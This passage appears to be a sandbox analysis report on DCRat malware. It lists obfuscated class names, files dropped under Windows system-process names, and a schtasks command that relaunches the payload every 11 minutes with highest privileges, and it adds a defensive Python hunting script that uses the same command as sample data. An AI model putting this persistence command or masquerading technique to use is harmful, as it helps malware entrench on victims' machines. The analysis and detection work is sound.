              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, R7jPP7ImnklP4rRFTd.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'hnMETjHItvYbiaLlYDV', 'Ef8hF3H4F0L4wHGGS3I', 'Lg5IKTH6OWLrn6sK4Yn', 'UnywjKHPIlwXys8n2n2', 'YC9strHMmurs6kxuPKq', 'KTx4UJH3hoajiFMSPOt'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, qtGSCFtKy5HjO36b70.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'jLRxEYfRk6ZRYw3EXxC', 'AYt4IEfkMRcw18mGZvW', 'kkNJuLfpWTscvgZhijK', 'SFoNMGfhG4DyAPa2gRj', 'iV3OmafCTqoBwEUJRiw', 'cIdceCfgJMVcjqXkfuC'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, n0pvB6kIpyvFRJXXn7k.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'N2TGuQXamJ', '_168', 'LXqI3CZBabtGkBnCwk4', 'YPKVP9ZngfkKnPydbqO', 'hjXfsDZYW8jMJNdFPwS', 'WuP2RrZK2nhUWUsAQ94', 'we7nvLZE8KgQ4pmsxNZ'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, nhfg4RkyLVj5ML4FnpW.csHigh entropy of concatenated method names: 'fcqRqu9D7v', 'rvsRpuw3vT', 'SZlRhMv1ro', 'N6xu3DQpQqC5Fu9HoMU', 'fyQ4fkQhqnyKnhdOqS6', 'kJ5O7pQCaZcSZFZIdoL', 'WSPUenQgYYiWnKZuCV2', 'agDLM2QSLGFPXE5OgAM', 'oFDQHwQsVXci4Xrks1k', 'm6iZ3RQeScPEx0PZVmj'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, YegRPiMFsvSTUy2Ptw0.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'Bj3wDklYlo', 'K0swcRCkRa', 'vCJwPxEkPp', 'yp6wBEStdG', 'hlewZb2Vmj', 'FBqdPmWP5U9iY1SFK3q', 'rKnFN1WMtAsxILn93HF', 'oE2fb4W49ox1DT1U1tq'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, Oqp2h45MbLWUyY0jC2l.csHigh entropy of concatenated method names: 'lM7HRQ9ITC', 'PqMHF9mYm1', '_8r1', 'mcPHi6Q2x4', 'ksfHfmPIU4', 'klrHxWFDok', 'fKhHgDyP6K', 'h31qF1tlvDMBBc4qvOb', 'jLZwZftwZ7rqKi6ixfe', 'wZRs8EtWuns3RF0TkEW'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, uPfSZV53W3JdoE5DHk8.csHigh entropy of concatenated method names: 'qM7XNkc3Vc', 'WQkXnD5oeA', 'NmtXEvqHXH', 'QkTXqaJcu4', 'Op8XpBcY05', 'RknXh8VrsY', '_838', 'vVb', 'g24', '_9oL'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, KbcJCiXXRFZqdFTya1b.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'RWZdmAINqpWL63JJLFN', 'utPoQMIxVWQB5wXh59w', 'ErQMSOIQxIKLGvZqytP', 'lw8HkNI94AilQwJp17Y', 'OHw4kSIjcf2se1itVv4', 'V1dlrEIZ4yLOupYocol'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, DkrhvAkKQqbxVpf8sH6.csHigh entropy of concatenated method names: 'MLBp6VJr2q2FuGVHYUC', 'UcCI1CJ2ZatwrmC8h6l', 'FsUulOJoaTnjWcJTkrt', 'uF8tMdJTDlBnlM7gBa0', 'IWF', 'j72', 'KCli3w53G6', 'HQAi7WIDGG', 'j4z', 'u0fiL2niwR'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, M3xuuMru7yvhEBnL6WJ.csHigh entropy of concatenated method names: 'sY8YEn9dLh', 'oTaYqNthj9', 'vaSYpDBLoI', 'jHy4nqrtsuJLVaGuBmH', 'jium6ir20tb9x0apE3m', 'bY4SLArDMQBHiglT9GZ', 'pVbkbBrbTq3Mq8hwbu7', 'NLY78kruFMhaRra42OC', 'T7HdcwrRQqMreTCeuX8', 'TA7BH7rkrr0sfOKy12Y'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, deeUvwDr1F0DQZu6DkX.csHigh entropy of concatenated method names: 'aYUx3fSue8', 'NSYy5ABUXilRqy94S45', 'Hje8g1BN0Wge0IhikWm', 'FrhEGXBwJWpXigapZue', 'wjTpJHBWVFXucXpkYJA', 'gUlivCSevW', 'vyxijcp6gk', 'jK4idsomhJ', 'dVhi2SbvUv', 'bAbiDeyID4'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, QG5wveM3LgkoM4utFO8.csHigh entropy of concatenated method names: 'THTGXd54g9', 'LlnGH5wW38', 'HFZGuN2Mgo', 'nv9BTD1dgwBKgByOLNj', 'y7fX8h18fEFCBgc8XqO', 'Onv1mq1oBLmQhg26G9W', 'Yrd5wn1TEMkNcyAEmG9', 'E7jAev1ryLaiPvkh729', 'zILvO712iw2MYYQe8uM', 'o7j94J1FOfS3efTjw4g'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, ySyEcdMc0cni3Q58xjX.csHigh entropy of concatenated method names: 'od4KtMd6Yi', 'Y2lK8xg4k2', 'jCiKzoD0sQ', 'X16wTqpAsA', 'UwLwSyR5k7', 'oLFwGDe24B', 'reSwbGbcxO', 'MiHwKKbr6M', 'dTxwwj6hoI', 'oH920mliUAsW1ssDfOk'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, WHDInNVdHmUBgCtoi3.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'lRiwWhfWeGWb0mDrG9U', 'VbUZWgfUSbQvyaC9Pdv', 'ICG68jfN3L5tep3x9te', 'qe9ecBfxsxNcVLMCxHG', 'g2iXBifQjT1ktviJioY', 'LPXijIf9ZCCgMmrLF6Y'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, PNKNrn423aLw7YTXAHt.csHigh entropy of concatenated method names: 'yucBDaMMP3ECX', 'vyn36Op7S1eDK6Fo3vm', 'pnZE9MplapgQxsowx5a', 'jENnnCpwTNPEY3Vp3hK', 'ihRwU9pWoLl7mLENj3c', 'aylK7HpUuVITtLZewJ3', 'ACAK56pGZ4qlfa905XL', 'jYtERip0o4e4prA4nqU', 'SmhZAJpNrGMGPNDmgmS', 'JUVss3pxOBiloqjaAk4'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, AnGUVdD2JESKqb0kjLg.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, vuI9WhDKcr3MwVZ4Abr.csHigh entropy of concatenated method names: 'PJ0yXvkQrk', 'c2xyuTMi4d', 'NrpykOciTD', 'dZNylap7gw', 'KvQyyJeyCO', 'VyfyUegaNa', 'gSMy3CSdEb', 'NAMy7HomTk', 'jUEyLnimSX', 'DHGyCFxrR9'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, GctDFZX41lS9Uo7uuCY.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'Uwr5vTIiWjwcYngGWgJ', 'EUOf6qIyRhpmwSklL7m', 'qtXKpFIXRMHDIQ694xi', 'ywMN29IvZpCnhPQB7UT', 'eHYtqUIV6jXNMrdXFGA', 'CHpih9IzPL6s86wDmCF'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, SktYJqkXLPIuQ6Awout.csHigh entropy of concatenated method names: 'RtgW0UJt9s', 'RGpWvSvxAq', 'b3tWjZ0iKr', 'IdLWdrXJSJ', 'U8jTFMUzVvcqdI1HDjd', 'gqIyrTUvLaDLButUU8H', 'Rj60hxUVqjy7YSgvJ9G', 'L0Duk7N5w2id9lXCrtM', 'SGCSJpNaFDhAOPNv3yE', 'bKiUWeNmtNZykJXx0KV'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, mlk1UZXKuLKF5JDXCmf.csHigh entropy of concatenated method names: 'HGHGCC3pnt', 'PMFKAG1IJLMsJP3rFBV', 'DyTFnY148eUATHh7Dhw', 'g9ntY81fRStEYuH89Hk', 'uM31K61H2MmaPPqQadm', 'dgVBDP16hIGdOjUYfM0', '_5q7', 'YZ8', '_6kf', 'G9C'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, iRKR1nXyR9O1jxumahV.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'cHpum34egfeTIb4Sdnd', 'B0ZuOV4LPImaZwJi5Pg', 'GqSZAQ4ignGH9u1iMlC', 'Jc6Cm34yLoeihFSreTE', 'EFfQsp4XpefdbH3GNQd', 'H6FAd54v2U1f0BGelAZ'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, wxlCxPkYywwxbY5Yf0k.csHigh entropy of concatenated method names: 'g7dFy6Ru26', 'lReFUD5c13', 'cyGF3XyeVy', 'e9682U9RXr0kVildrd2', 'fLRWS79bisoSP8SVcBf', 'btb3vu9u3Kp8mbLFUZJ', 'JxUxBY9kYiRotWnW9FZ', 'lH0FeK09an', 'hBkFWPSYgL', 'JrKFRdjvJJ'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, MsBg6K5RkP1uMJ0tCH3.csHigh entropy of concatenated method names: 'UvL0J4QlU4', '_1kO', '_9v4', '_294', 'fiN09k7ww6', 'euj', 'XqY0YcsQHH', 'IU70XKQPcs', 'o87', 'VDG0HBWOOJ'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, L7trMlXk084m2iRiuOD.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'BR8JGxIqowvt7Evqt19', 'keGBxsIFCHwBPCI5TN7', 'GSSyCmIAp3nSaWM96iD', 'ycCsxQIdyhWFEUgsE74', 'iZ8ZkAI8MLwxvQmFqlQ', 'zUuFbOIoXb5oGaNA3H6'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, svkKVPMTtQZgVyRGCYB.csHigh entropy of concatenated method names: 'kyJbtL3ClB', 'nx0b8UxLc4', 'A2hty50NULorsvmYhWY', 'H9mMBL0xEHgKSEnn91C', 'Ad1cMr0QfJVKsmbaAGZ', 'gmvSbw09DVsSVLAmhBR', 'Rfq8Lv0jNDScGRXA51l', 'adcMhi0ZY4tiPAm4qck', 'qWWd9F0JOsEahB0IXiB', 'tASqwt0B6pEBFET5id8'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, ooLRuLDTQX9YMad3xl6.csHigh entropy of concatenated method names: 'H4jgKJkYAu', 'FHhgwE3xbA', 'HK2geNLcgF', 'nvs919nwtCcbuDT8nsk', 'gxZT8SnWWtulfk6mvda', 'uT6bbsn7Uwg26WXLo5F', 'vhSGs1nlEpxaj5Y1eCs', 'ytCVTinUVrwV5p5iGvR', 'jGRfplnNuYGdd7vWY61', 'Ja6i2inxwKKaSGQ0irC'

              Persistence and Installation Behavior

              Source: C:\Componenthost\providerreviewdhcp.exe WMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create (21 identical entries)
              Source: C:\Componenthost\providerreviewdhcp.exe File created: C:\Recovery\csrss.exe (2 entries)
              Source: C:\Componenthost\providerreviewdhcp.exe File created: C:\Program Files\Windows Security\BrowserCore\en-US\csrss.exe (2 entries)
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe File created: C:\Componenthost\providerreviewdhcp.exe
              Source: C:\Users\user\Desktop\cougif6lqM.exe File created: C:\Users\user\AppData\Local\Temp\DCRatBuild.exe
              Source: C:\Componenthost\providerreviewdhcp.exe File created: C:\Program Files (x86)\Windows Defender\en-GB\Memory Compression.exe
              Source: C:\Users\user\Desktop\cougif6lqM.exe File created: C:\Users\user\AppData\Local\Temp\javaclient.exe
              Source: C:\Componenthost\providerreviewdhcp.exe File created: C:\Users\Default\AppData\Roaming\Microsoft\Windows\Printer Shortcuts\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
              Source: C:\Componenthost\providerreviewdhcp.exe File created: C:\Program Files\Windows Mail\WmiPrvSE.exe
              Source: C:\Componenthost\providerreviewdhcp.exe File created: C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe
              Source: C:\Componenthost\providerreviewdhcp.exe File created: C:\Users\user\cmd.exe (2 entries)

              Boot Survival

              Source: C:\Componenthost\providerreviewdhcp.exe File created: C:\Users\user\cmd.exe
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe Process created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" /sc MINUTE /mo 11 /tr "'C:\Componenthost\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe'" /rl HIGHEST /f
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\JavaClient.lnk (2 entries)
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run JavaClient (2 entries)
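              The task creation, the drops under system-process names and the user-level autostarts recorded in the two sections above are exactly the artifacts an analyst hunts for in process, file and registry telemetry after a detonation like this one. The Python below is an added example written for this page; it is not part of the Joe Sandbox report and not code from the sample. It parses a schtasks /create command line, flags PE files whose name belongs to a Windows process but whose directory does not, and flags Run-key writes or Startup-folder drops made by a process running from a user-writable path. The event records are constructed from the paths and the command line listed above; the two benign control events, the rule names and the EXPECTED_DIRS table (default Windows layout) are this example's own assumptions.

```python
"""Hunt endpoint telemetry for the persistence listed above: a schtasks /create
that re-launches a dropped binary with /rl HIGHEST every few minutes, PE files
that borrow a system-process name outside that process's home directory, and
user-level autostarts (HKCU Run value, Startup .lnk) written from %TEMP%."""
import re
from typing import Optional

# Assumption: default Windows layout for the three system names the dropper reuses.
EXPECTED_DIRS = {
    "csrss.exe": {"c:\\windows\\system32"},
    "wmiprvse.exe": {"c:\\windows\\system32\\wbem", "c:\\windows\\syswow64\\wbem"},
    "cmd.exe": {"c:\\windows\\system32", "c:\\windows\\syswow64"},
}
TRUSTED_ROOTS = ("c:\\windows\\", "c:\\program files\\", "c:\\program files (x86)\\")
USER_WRITABLE = ("c:\\users\\", "\\appdata\\", "\\temp\\")
_TOKEN = re.compile(r'"[^"]*"|\S+')  # keeps a quoted argument as one token
_RUN_KEY = re.compile(r"\\currentversion\\run(once)?$")

def _norm(path: str) -> str:
    return path.strip("\"' ").lower()  # case-fold, drop the quotes schtasks args carry

def parse_schtasks(cmdline: str) -> Optional[dict]:
    """Return /tn /sc /mo /tr /rl of a schtasks /create command line, else None."""
    tokens = _TOKEN.findall(cmdline)
    lowered = [t.lower() for t in tokens]
    if (not tokens or lowered[0].rpartition("\\")[2] not in ("schtasks", "schtasks.exe")
            or "/create" not in lowered):
        return None
    args = {}
    for i, tok in enumerate(lowered[:-1]):
        if tok in ("/tn", "/sc", "/mo", "/tr", "/rl"):
            args[tok[1:]] = tokens[i + 1].strip("\"'")
    return args

def rate_task(args: dict) -> list:
    """Traits of a parsed task creation that match the persistence seen here."""
    reasons = []
    if args.get("rl", "").upper() == "HIGHEST":
        reasons.append("runs with /rl HIGHEST")
    if args.get("sc", "").upper() == "MINUTE":
        every = int(args["mo"]) if args.get("mo", "").isdigit() else 1  # /mo defaults to 1
        if every <= 15:
            reasons.append(f"re-launches every {every} minute(s)")
    target = _norm(args.get("tr", ""))
    if target and not target.startswith(TRUSTED_ROOTS):
        reasons.append(f"target outside Windows/Program Files: {target}")
    return reasons

def masquerading_path(path: str) -> Optional[str]:
    """Reason string if `path` carries a system-process name outside its home."""
    directory, _, name = _norm(path).rpartition("\\")
    homes = EXPECTED_DIRS.get(name)
    if homes is None or directory in homes:
        return None
    return f"{name} dropped outside {', '.join(sorted(homes))}: {_norm(path)}"

def user_autostart(event: dict) -> Optional[str]:
    """Run-key write or Startup-folder drop by a process living in user-writable space."""
    image = _norm(event.get("image", ""))
    if not any(marker in image for marker in USER_WRITABLE):
        return None
    if event["kind"] == "registry" and _RUN_KEY.search(_norm(event["key"])):
        return f"Run value '{event['value']}' written by {image}"
    if event["kind"] == "file" and "\\start menu\\programs\\startup\\" in _norm(event["path"]):
        return f"Startup shortcut {_norm(event['path'])} dropped by {image}"
    return None

def hunt(events: list) -> list:
    """Run the three checks; returns (rule, subject, reason) tuples in event order."""
    findings = []
    for ev in events:
        if ev["kind"] == "process":
            args = parse_schtasks(ev["cmdline"])
            reasons = rate_task(args) if args else []
            if len(reasons) >= 2:  # a single trait is common for legitimate installers
                findings.append(("scheduled_task", args.get("tn", "?"), "; ".join(reasons)))
        reason = masquerading_path(ev["path"]) if ev["kind"] == "file" else None
        if reason:
            findings.append(("system_name_masquerade", ev["image"], reason))
        reason = user_autostart(ev)
        if reason:
            findings.append(("user_autostart", ev["image"], reason))
    return findings

# Constructed events mirroring the report's task, drops and Run key, plus two invented
# benign controls (a genuine cmd.exe written by TrustedInstaller and an ordinary daily task).
TEMP_EXE = "C:\\Users\\user\\AppData\\Local\\Temp\\javaclient.exe"
DROPPER = "C:\\Componenthost\\providerreviewdhcp.exe"
SAMPLE_EVENTS = [
    {"kind": "process", "image": TEMP_EXE, "cmdline": 'schtasks.exe /create /tn "hvxmowIikyCfRrhhAMpWFavmEnuKtLh" '
     '/sc MINUTE /mo 11 /tr "\'C:\\Componenthost\\hvxmowIikyCfRrhhAMpWFavmEnuKtL.exe\'" /rl HIGHEST /f'},
    {"kind": "file", "image": DROPPER, "path": "C:\\Recovery\\csrss.exe"},
    {"kind": "file", "image": DROPPER, "path": "C:\\Program Files\\Windows Mail\\WmiPrvSE.exe"},
    {"kind": "file", "image": DROPPER, "path": "C:\\Users\\user\\cmd.exe"},
    {"kind": "file", "image": TEMP_EXE, "path": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\JavaClient.lnk"},
    {"kind": "registry", "image": TEMP_EXE, "value": "JavaClient", "key": "HKEY_CURRENT_USER\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run"},
    {"kind": "file", "image": "C:\\Windows\\servicing\\TrustedInstaller.exe", "path": "C:\\Windows\\System32\\cmd.exe"},
    {"kind": "process", "image": "C:\\Windows\\System32\\cmd.exe", "cmdline": 'schtasks /create /tn "Nightly Backup" /sc DAILY /tr "C:\\Program Files\\Backup\\backup.exe"'},
]
```

              Running hunt(SAMPLE_EVENTS) yields six findings: the 11-minute HIGHEST task, the three csrss.exe/WmiPrvSE.exe/cmd.exe drops outside their home directories, the Startup shortcut and the HKCU Run value, while the two control events produce nothing. The task rule deliberately needs two traits before it fires, since /rl HIGHEST alone is common in legitimate installers; in production the same functions would be fed Sysmon event 1, 11 and 13 fields (or their EDR equivalents) instead of the constructed list.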

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (4 entries)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (3 entries)
              Source: C:\Users\user\Desktop\cougif6lqM.exe Process information set: NOOPENFILEERRORBOX (21 entries)
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exe Process information set: NOOPENFILEERRORBOX (24 entries)
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\javaclient.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\DCRatBuild.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Componenthost\providerreviewdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
